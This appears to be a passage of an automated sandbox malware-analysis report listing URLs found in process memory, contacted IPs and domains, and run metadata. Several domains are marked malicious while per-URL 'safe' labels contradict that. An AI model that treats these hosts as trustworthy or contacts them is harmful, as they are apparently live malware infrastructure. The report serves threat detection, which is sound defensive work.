http://www.xiaomiaozhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://einpisalpace.shop/ | OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002DA8000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://laduta.xyz/d89m?CviT=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl | OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000002C16000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wuyezhibo.com | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.banditi.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eventsmedia.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.68markavenue.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://white.anva.org.cn/ | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nuoyunzhibo.com | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.welovebeauty.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.agrobazar.net | OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hairdeluxe.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.legalvideos.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xunaizhibo.com/binding | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.perfectpint.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://zzlz.gsxt.gov.cn/ | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.huayuzhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.theflowerpot.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.legalstrategy.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.wuyezhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.chuncaozhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/template/news/wandoujia/static/picture/qr-5_httpswww.wandoujia.comqr.png | OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.rsbi.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.implantcentre.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xingyuanzhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.easygram.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.qinglizhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.liangmeizhibo.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yanyuzhibo.com | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.mynewshub.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.babyzhibo.net/template/news/wandoujia/static/js/index.umd.js | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.startuptalent.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lovevintage.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gotogermany.net | chkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                                http://www.hiload.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.babyzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1dchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.biomedika.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.luxbrand.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.happystories.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.ecosia.org/newtab/chkntfs.exe, 00000008.00000003.2814364830.000000000784E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/anva-zilv.pngchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.athousandwords.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/replyItem.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.yanyangzhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.bodyonline.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3debchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/js.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.losbravos.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.megaos.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.allprinting.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.methlab.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.qiyuezhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.huoyazhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.miaozhaozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.naikuaizhibo.comchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/bl.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/header.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.electrocat.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.implantcentre.net/bindingchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.liguizhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.qilinzhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/picture/default_avatar.jpgOlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.anmozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.mzkd6gp5.topOlGIUOYUZW.exe, 00000009.00000002.3994960615.0000000000869000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.aguardiente.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.eurosupport.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.xiapizhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.babyzhibo.net/template/news/wandoujia/static/js/tracker.fe363a40.jschkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kleenair.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.aicaozhibo.netchkntfs.exe, 00000008.00000002.3997004684.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, chkntfs.exe, 00000008.00000002.3999398361.00000000075A0000.00000004.00000800.00020000.00000000.sdmp, OlGIUOYUZW.exe, 00000009.00000002.3996887397.0000000003582000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.16.1 | www.mzkd6gp5.top | United States | 13335 | CLOUDFLARENETUS | true
47.83.1.90 | www.ripbgs.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true
192.64.119.109 | www.laduta.xyz | United States | 22612 | NAMECHEAP-NETUS | true
172.65.235.97 | url.gname.net | United States | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | www.einpisalpace.shop | European Union | 13335 | CLOUDFLARENETUS | false
192.186.58.31 | www.babyzhibo.net | United States | 132721 | PING-GLOBAL-ASPingGlobalAmsterdamPOPASNNL | true
162.0.236.169 | www.explorevision.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
                                                    IP
                                                    127.0.0.1
                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1589871
                                                    Start date and time:2025-01-13 09:32:27 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 9m 47s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Run name:Run with higher sleep bypass
                                                    Number of analysed new started processes analysed:9
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
